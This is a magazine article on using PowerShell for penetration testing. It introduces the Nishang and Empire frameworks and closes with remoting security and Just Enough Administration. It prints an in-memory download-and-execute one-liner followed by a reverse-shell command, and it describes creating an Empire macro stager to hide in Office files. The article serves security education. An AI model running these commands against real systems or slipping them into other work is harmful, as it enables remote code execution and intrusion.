Security PowerShell as a Security Tool Lead image: Lead Image © Freya Sapphire, Photocase.com
Lead Image © Freya Sapphire, Photocase.com
 

Stressing security with PowerShell

Impenetrable

PowerShell is not the usual go-to tool for pentesting, but it can reveal IT vulnerabilities that suggest a more considered use of the tool. By Thomas Wiefel

Windows PowerShell is more than just a preferred tool for administrators – it's ideal for penetration testing. To check a system thoroughly for vulnerabilities, pentesters need to assume the role of the attacker. With the help of native scripts by Nishang and Empire, known security gaps can be tested, the authorization level escalated, system information obtained, or the system damaged by malware.

Windows PowerShell (WPS) has been the standard tool of many system administrators for several years, providing both imperative (command chains with system instructions) and declarative (defined objectives such as Desired State Configuration) features. The idea of associating this tool with "hacking" because of its everyday use seems a little strange. However, it is the comprehensive conceptual design of PowerShell that makes it interesting for penetration tests. In security, the framework is mainly used in three areas: post-exploitation, infrastructure scanning and information gathering, and attacks over the communication structure.

Procedure and Tools of Attackers

Post-exploitation essentially refers to the operational phases after a victim's system has been compromised by the attacker. The value of the compromised system is determined by the data stored on it and its potential use for malicious purposes. Post-exploitation focuses on the information from the hacked system, which is available for further use within complex structures, especially networks. In this phase, the attacker collects confidential data to analyze configuration settings, network interfaces, and other communication channels. The information is used to maintain permanent access to the system in line with the attacker's requirements. The system can be compromised by exploiting existing vulnerabilities in the remote configuration, by social engineering, or by leveraging exploits in applications.

For the second phase of infiltration, hybrid frameworks consist of non-system-specific tools like Python and generated PowerShell scripts. The setup often relies on a Linux host with a configured web server that acts as the center for attack control. Although the structure is heterogeneous, these frameworks will hereafter be called "PowerShell Frameworks," because the transferred payload comprises PowerShell code.

The other existing form of PowerShell exploit applications is native scripts. Known vulnerabilities are tested to escalate the authorization level, grab system information, and even damage the system with malware. Frameworks such as Nishang [1] and Empire [2] are available for these objectives.

Running Malicious Scripts with Nishang

Nishang is an open source framework for creating powerful PowerShell scripts. Unlike Empire, which follows the hybrid approach, Nishang is a PowerShell-only application at its core. Nishang scripts are classified as malicious and blocked by many antivirus programs. Bypassing the defenses of Windows Defender or virus scanners is in itself an attack technique that shows that PowerShell scripts can also bypass restrictions. Windows Defender prevents direct execution of Nishang PowerShell files.

A conceivable platform for executing test scripts is a sandbox system, where the scripts can be run as binary code. As tools, specialized meta-frameworks are available on GitHub, PowerLine [3] being just one example. PS2EXE [4] also follows a similar approach, although with completely different administrative goals. Another option for executing PowerShell code is based on a volatile process space, wherein scripts are placed in memory on the target system. By in-memory downloading and execution of the PowerShell script, the remote scripts can be imported into the local session as a statement list, which transfers functions and variables to the current context:

PowerShell invoke-Expression (New-Object Net.WebClient).DownloadString("http://$companyWebServer/Invoke-PowerShellTcp.ps1");
Invoke-PowerShellTcp -Reverse -IPAddress $ipAddress -Port $PortNumber

The scripts themselves are divided into categories:

After cloning the repository into a local directory, subdirectories are available for the various objectives of a penetration test. Within the subdirectories are PowerShell applications with concrete tasks and, in the client section, scripts for creating Excel (XLS), HTML Application (HTA), or Compiled HTML Help (CHM) file types with integrated malware. The comprehensive approach makes Nishang a good introduction to penetration testing with PowerShell. With no complex requirements for the test lab, access is facilitated.

Pentesting with Empire

The Empire framework provides an example of how to use a dedicated server as a platform for the test suite. If Empire is not available on the distribution you are using, you can install it manually. First, you need to create a project directory (e.g., /opt/projects) before enabling version control and cloning the sources:

cd /opt/projects
git init
git clone https://github.com/EmpireProject/Empire.git

The newly created Empire directory contains the Setup subdirectory. For the installation, you need to run setup.sh from this directory. Confirm the prompts shown by the routine by answering affirmatively. When you are done, you can launch the framework by typing sudo ./empire; exit closes the Empire console.

Before running any tests, it is worth taking a look at the structure of the framework:

An integrated help feature, which you can call up in Empire with the help command, gives you a hand in managing the many modules. The listeners command takes you to the listeners management menu. Within the submenu, help is context-driven and refers to the listeners. Other useful commands in this submenu are shown in Table 1.

Tabelle 1: Listeners Subcommands

Command

Action

list

Shows active listeners.

uselistener

Starts new listener module.

usestager

Initializes the stager.

agents

Switches to the agents menu.

back or main

Leads to the main menu.

exit

Leaves Empire.

help

Displays the help menu.

info

Provides information about the active listener.

kill

Ends a listener process.

Empire lets you create client-based tests with Office applications and hide framework-generated macros in unobtrusive Office files, as with Nishang. Creating the malicious code is easy from the Empire console window. The first step is to switch to the listener menu. You can complete the uselistener command with the Tab key, as shown in Figure 1. An existing listener, to which you can bind a new stager, must be active. Now create the macro with:

The uselistener http command lets you create a new listener from predefined modules.
Figure 1: The uselistener http command lets you create a new listener from predefined modules.
usestager multi/macro http

After executing the info command, you will see the settings of the macro you just created. The execute command saves the snippet with the default settings in /tmp/macro. The script macro is displayed with cat /tmp/macro. Now you can copy the macro and hide it in an office file with the macro recorder.

Modules are the core of Empire. Analysis of functionality from the Empire console and the help menu opens a multitude of test possibilities against IT systems. This complexity makes the use of Empire worthwhile despite the costly creation of a test lab. Besides this use of PowerShell offensively, many approaches can minimize risks, including techniques for restricting the set of available PowerShell cmdlets and command containers (modules), for removing vulnerabilities in remote management, and ultimately, for restricting PowerShell from accessing .NET, Component Object Model (COM), and Windows Management Instrumentation (WMI) classes. (See also the "Just Enough Administration" box.)

Securing Remote Maintenance

Starting in PowerShell version 3, remote maintenance is supported by the Windows Remote Management (WinRM) service and the Web Services Management (WSMAN) protocol. WSMAN was designed as a secure and reliable method for managing computers based on Simple Object Access Protocol (SOAP) and HTTP. Both session-controlled 1:1 management by get-Command -noun PsSession and 1:N administration with the Invoke command are possible. Remote admins can start, view, terminate, and delete terminal sessions.

Additionally, alternative methods such as the Distributed Component Object Model (DCOM) relying on WMI calls or remote procedure calls (RPCs) also exist in PowerShell. PowerShell remoting by WinRM does not rely on an API call; rather, it communicates with a remote peer. The executed commands are sent to the remote shell and executed there, and the results are returned. An administrator uses PowerShell remoting to connect to server A. The existing session should then connect to server B, passing in the existing credentials. However, this approach fails, and access to the resource on server C is denied, because the credentials that were used to create the remote PowerShell session are not passed from server B to server C.

As a workaround, PowerShell offers Credential Security Support Provider (CredSSP) as an authentication method. However, when using CredSSP, PowerShell performs a network logon in plain text instead of an encrypted connection. Therefore, when using CredSSP, the password is first sent as a text message to server A, and the user can then authenticate against server B.

PowerShell Limitations

Windows PowerShell is a .NET application that belongs to the System.Management.Automation class type in the .NET framework. Interoperability with the .NET framework puts WPS on par with the most powerful scripting languages, ranking up there with high-level languages like C#. Windows PowerShell has automatic and self-defined variables, as well as host environment variables, that can be used to control PowerShell's behavior. The $ExecutionContext variable is particularly relevant for security; it contains a list of sub-objects with configuration options. Settings regarding class access can be implemented by the SessionState.LanguageMode object, where:

Conclusions

Deeply anchored in the system and with access to system APIs, PowerShell can play the devil's advocate, assuming the role of the bad guys and scanning for IT vulnerabilities. The knowledge of offensive possibilities can lead to a more considered use of Windows PowerShell. Here, Just Enough Administration especially seeks to replace rigid group-based management with the roles that admins actually need.